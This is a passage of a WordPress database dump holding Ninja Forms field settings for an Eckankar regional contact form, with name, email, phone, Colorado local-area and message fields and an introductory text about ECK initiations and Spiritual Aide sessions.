Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8753,199,'field_label','Text','field_label','Text'),(8754,199,'field_key','html_153','field_key','html_153'),(5592,195,'key','listselect_76','key','listselect_76'),(5593,195,'container_class','','container_class',''),(5594,195,'parent_id','18','parent_id','18'),(5595,196,'objectType','Field','objectType','Field'),(5596,196,'objectDomain','fields','objectDomain','fields'),(5597,196,'editActive','','editActive',''),(5598,196,'order','10','order','10'),(5599,196,'type','textarea','type','textarea'),(5600,196,'label','Enter Your Message Here','label','Enter Your Message Here'),(5601,196,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5602,196,'label_pos','above','label_pos','above'),(5603,196,'default_value','','default_value',''),(5604,196,'textarea_rte','0','textarea_rte','0'),(5605,196,'textarea_media','0','textarea_media','0'),(5606,196,'disable_rte_mobile','0','disable_rte_mobile','0'),(5607,196,'input_limit','','input_limit',''),(5608,196,'input_limit_type','char','input_limit_type','char'),(5609,196,'calc_auto_include','0','calc_auto_include','0'),(5610,196,'num_sort','0','num_sort','0'),(5611,196,'admin_label','','admin_label',''),(5612,196,'show_help','0','show_help','0'),(5613,196,'help_text','','help_text',''),(5614,196,'show_desc','0','show_desc','0'),(5615,196,'desc_pos','none','desc_pos','none'),(5616,196,'desc_text','','desc_text',''),(5617,196,'element_class','','element_class',''),(5618,196,'required','1','required','1'),(5619,196,'default','','default',''),(5620,196,'key','textarea_77','key','textarea_77'),(5621,196,'placeholder','','placeholder',''),(5622,196,'container_class','','container_class',''),(5623,196,'manual_key','','manual_key',''),(5624,196,'parent_id','18','parent_id','18'),(17467,621,'order','11','order','11'),(17466,621,'editActive','','editActive',''),(17465,620,'drawerDisabled','','drawerDisabled',''),(17463,620,'element_class','','element_class',''),(17464,620,'key','html_1663797774442','key','html_1663797774442'),(17462,620,'container_class','','container_class',''),(5642,198,'objectType','Field','objectType','Field'),(5643,198,'objectDomain','fields','objectDomain','fields'),(5644,198,'editActive','','editActive',''),(5645,198,'order','12','order','12'),(5646,198,'type','submit','type','submit'),(5647,198,'label','Submit','label','Submit'),(5648,198,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5649,198,'show_help','0','show_help','0'),(5650,198,'help_text','','help_text',''),(5651,198,'show_desc','0','show_desc','0'),(5652,198,'desc_pos','none','desc_pos','none'),(5653,198,'desc_text','','desc_text',''),(5654,198,'processing_label','Processing','processing_label','Processing'),(5655,198,'element_class','','element_class',''),(5656,198,'key','submit_79','key','submit_79'),(5657,198,'container_class','','container_class',''),(5658,198,'parent_id','18','parent_id','18'),(5659,199,'objectType','Field','objectType','Field'),(5660,199,'objectDomain','fields','objectDomain','fields'),(5661,199,'editActive','','editActive',''),(5662,199,'order','1','order','1'),(5663,199,'type','html','type','html'),(5664,199,'label','Text','label','Text'),(5665,199,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5666,199,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(5667,199,'desc_el','div','desc_el','div'),(5668,199,'show_desc','0','show_desc','0'),(5669,199,'desc_pos','none','desc_pos','none'),(5670,199,'desc_text','','desc_text',''),(5671,199,'element_class','','element_class',''),(5672,199,'default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(5673,199,'key','html_153','key','html_153'),(5674,199,'container_class','','container_class',''),(5675,199,'drawerDisabled','','drawerDisabled',''),(5676,199,'parent_id','19','parent_id','19'),(5677,200,'objectType','Field','objectType','Field'),(5678,200,'objectDomain','fields','objectDomain','fields'),(5679,200,'editActive','','editActive',''),(5680,200,'order','2','order','2'),(5681,200,'type','textbox','type','textbox'),(5682,200,'def_id','6','def_id','6'),(5683,200,'label','First Name','label','First Name'),(5684,200,'label_pos','above','label_pos','above'),(5685,200,'mask','','mask',''),(5686,200,'datepicker','0','datepicker','0'),(5687,200,'first_name','1','first_name','1'),(5688,200,'last_name','0','last_name','0'),(5689,200,'from_name','0','from_name','0'),(5690,200,'user_info_field_group','1','user_info_field_group','1'),(5691,200,'show_help','0','show_help','0'),(5692,200,'help_text','','help_text',''),(5693,200,'calc_auto_include','0','calc_auto_include','0'),(5694,200,'calc_option','0','calc_option','0'),(5695,200,'placeholder','','placeholder',''),(5696,200,'user_address_1','','user_address_1',''),(5697,200,'user_address_2','','user_address_2',''),(5698,200,'user_city','','user_city',''),(5699,200,'user_zip','','user_zip',''),(5700,200,'user_phone','','user_phone',''),(5701,200,'user_email','','user_email',''),(5702,200,'disable_input','0','disable_input','0'),(5703,200,'input_limit','','input_limit',''),(5704,200,'input_limit_type','char','input_limit_type','char'),(5705,200,'input_limit_msg','','input_limit_msg',''),(5706,200,'user_state','0','user_state','0'),(5707,200,'autocomplete_off','0','autocomplete_off','0'),(5708,200,'num_sort','0','num_sort','0'),(5709,200,'admin_label','','admin_label',''),(5710,200,'user_info_field_group_name','','user_info_field_group_name',''),(5711,200,'user_info_field_group_custom','','user_info_field_group_custom',''),(5712,200,'show_desc','0','show_desc','0'),(5713,200,'desc_pos','none','desc_pos','none'),(5714,200,'desc_text','','desc_text',''),(5715,200,'element_class','','element_class',''),(5716,200,'required','1','required','1'),(5717,200,'key','textbox_154','key','textbox_154'),(5718,200,'default','','default',''),(5719,200,'container_class','one-half first','container_class','one-half first'),(5720,200,'manual_key','','manual_key',''),(5721,200,'custom_mask','','custom_mask',''),(5722,200,'parent_id','19','parent_id','19'),(5723,201,'objectType','Field','objectType','Field'),(5724,201,'objectDomain','fields','objectDomain','fields'),(5725,201,'editActive','','editActive',''),(5726,201,'order','3','order','3'),(5727,201,'type','lastname','type','lastname'),(5728,201,'def_id','7','def_id','7'),(5729,201,'label','Last Name','label','Last Name'),(5730,201,'label_pos','above','label_pos','above'),(5731,201,'mask','','mask',''),(5732,201,'datepicker','0','datepicker','0'),(5733,201,'first_name','0','first_name','0'),(5734,201,'from_name','0','from_name','0'),(5735,201,'user_info_field_group','1','user_info_field_group','1'),(5736,201,'show_help','0','show_help','0'),(5737,201,'help_text','','help_text',''),(5738,201,'calc_auto_include','0','calc_auto_include','0'),(5739,201,'calc_option','0','calc_option','0'),(5740,201,'placeholder','','placeholder',''),(5741,201,'user_address_1','','user_address_1',''),(5742,201,'user_address_2','','user_address_2',''),(5743,201,'user_city','','user_city',''),(5744,201,'user_zip','','user_zip',''),(5745,201,'user_phone','','user_phone',''),(5746,201,'user_email','','user_email',''),(5747,201,'disable_input','0','disable_input','0'),(5748,201,'input_limit','','input_limit',''),(5749,201,'input_limit_type','char','input_limit_type','char'),(5750,201,'input_limit_msg','','input_limit_msg',''),(5751,201,'user_state','0','user_state','0'),(5752,201,'autocomplete_off','0','autocomplete_off','0'),(5753,201,'num_sort','0','num_sort','0'),(5754,201,'admin_label','','admin_label',''),(5755,201,'user_info_field_group_name','','user_info_field_group_name',''),(5756,201,'user_info_field_group_custom','','user_info_field_group_custom',''),(5757,201,'show_desc','0','show_desc','0'),(5758,201,'desc_pos','none','desc_pos','none'),(5759,201,'desc_text','','desc_text',''),(5760,201,'element_class','','element_class',''),(5761,201,'required','1','required','1'),(5762,201,'key','lastname_155','key','lastname_155'),(5763,201,'default','','default',''),(5764,201,'container_class','one-half','container_class','one-half'),(5765,201,'parent_id','19','parent_id','19'),(5766,202,'objectType','Field','objectType','Field'),(5767,202,'objectDomain','fields','objectDomain','fields'),(5768,202,'editActive','','editActive',''),(5769,202,'order','4','order','4'),(5770,202,'type','email','type','email'),(5771,202,'def_id','14','def_id','14'),(5772,202,'label','Email','label','Email'),(5773,202,'label_pos','above','label_pos','above'),(5774,202,'mask','','mask',''),(5775,202,'datepicker','0','datepicker','0'),(5776,202,'first_name','0','first_name','0'),(5777,202,'last_name','0','last_name','0'),(5778,202,'from_name','0','from_name','0'),(5779,202,'user_address_1','0','user_address_1','0'),(5780,202,'user_address_2','0','user_address_2','0'),(5781,202,'user_city','0','user_city','0'),(5782,202,'user_zip','0','user_zip','0'),(5783,202,'user_phone','0','user_phone','0'),(5784,202,'user_info_field_group','1','user_info_field_group','1'),(5785,202,'show_help','0','show_help','0'),(5786,202,'help_text','','help_text',''),(5787,202,'calc_auto_include','0','calc_auto_include','0'),(5788,202,'calc_option','0','calc_option','0'),(5789,202,'placeholder','','placeholder',''),(5790,202,'disable_input','0','disable_input','0'),(5791,202,'input_limit','','input_limit',''),(5792,202,'input_limit_type','char','input_limit_type','char'),(5793,202,'input_limit_msg','','input_limit_msg',''),(5794,202,'user_state','0','user_state','0'),(5795,202,'autocomplete_off','0','autocomplete_off','0'),(5796,202,'num_sort','0','num_sort','0'),(5797,202,'admin_label','','admin_label',''),(5798,202,'user_info_field_group_name','','user_info_field_group_name',''),(5799,202,'user_info_field_group_custom','','user_info_field_group_custom',''),(5800,202,'show_desc','0','show_desc','0'),(5801,202,'desc_pos','none','desc_pos','none'),(5802,202,'desc_text','','desc_text',''),(5803,202,'element_class','','element_class',''),(5804,202,'required','1','required','1'),(5805,202,'key','email_156','key','email_156'),(5806,202,'default','','default',''),(5807,202,'container_class','one-half first','container_class','one-half first'),(5808,202,'parent_id','19','parent_id','19'),(5809,203,'objectType','Field','objectType','Field'),(5810,203,'objectDomain','fields','objectDomain','fields'),(5811,203,'editActive','','editActive',''),(5812,203,'order','5','order','5'),(5813,203,'type','phone','type','phone'),(5814,203,'def_id','15','def_id','15'),(5815,203,'label','Phone','label','Phone'),(5816,203,'label_pos','above','label_pos','above'),(5817,203,'mask','(999) 999-9999','mask','(999) 999-9999'),(5818,203,'datepicker','0','datepicker','0'),(5819,203,'first_name','0','first_name','0'),(5820,203,'last_name','0','last_name','0'),(5821,203,'from_name','0','from_name','0'),(5822,203,'user_address_1','0','user_address_1','0'),(5823,203,'user_address_2','0','user_address_2','0'),(5824,203,'user_city','0','user_city','0'),(5825,203,'user_zip','0','user_zip','0'),(5826,203,'user_email','0','user_email','0'),(5827,203,'user_info_field_group','1','user_info_field_group','1'),(5828,203,'show_help','0','show_help','0'),(5829,203,'help_text','','help_text',''),(5830,203,'calc_auto_include','0','calc_auto_include','0'),(5831,203,'calc_option','0','calc_option','0'),(5832,203,'placeholder','','placeholder',''),(5833,203,'disable_input','0','disable_input','0'),(5834,203,'input_limit','','input_limit',''),(5835,203,'input_limit_type','char','input_limit_type','char'),(5836,203,'input_limit_msg','','input_limit_msg',''),(5837,203,'user_state','0','user_state','0'),(5838,203,'autocomplete_off','0','autocomplete_off','0'),(5839,203,'num_sort','0','num_sort','0'),(5840,203,'admin_label','','admin_label',''),(5841,203,'user_info_field_group_name','','user_info_field_group_name',''),(5842,203,'user_info_field_group_custom','','user_info_field_group_custom',''),(5843,203,'show_desc','0','show_desc','0'),(5844,203,'desc_pos','none','desc_pos','none'),(5845,203,'desc_text','','desc_text',''),(5846,203,'element_class','','element_class',''),(5847,203,'required','1','required','1'),(5848,203,'key','phone_157','key','phone_157'),(5849,203,'default','','default',''),(5850,203,'container_class','one-half','container_class','one-half'),(5851,203,'manual_key','','manual_key',''),(5852,203,'custom_mask','','custom_mask',''),(5853,203,'parent_id','19','parent_id','19'),(5854,204,'objectType','Field','objectType','Field'),(5855,204,'objectDomain','fields','objectDomain','fields'),(5856,204,'editActive','','editActive',''),(5857,204,'order','6','order','6'),(5858,204,'type','listselect','type','listselect'),(5859,204,'label','Your Local Area','label','Your Local Area'),(5860,204,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5861,204,'label_pos','above','label_pos','above'),(5862,204,'list_type','dropdown','list_type','dropdown'),(5863,204,'multi_size','5','multi_size','5'),(5864,204,'list_show_value','1','list_show_value','1'),(5865,204,'list','a:0:{}','list','a:0:{}'),(5866,204,'user_info_field_group','','user_info_field_group',''),(5867,204,'calc_auto_include','0','calc_auto_include','0'),(5868,204,'user_state','0','user_state','0'),(5869,204,'num_sort','0','num_sort','0'),(5870,204,'admin_label','','admin_label',''),(5871,204,'show_help','0','show_help','0'),(5872,204,'help_text','','help_text',''),(5873,204,'show_desc','0','show_desc','0'),(5874,204,'desc_pos','none','desc_pos','none'),(5875,204,'desc_text','','desc_text',''),(5876,204,'element_class','','element_class',''),(5877,204,'required','1','required','1'),(5878,204,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 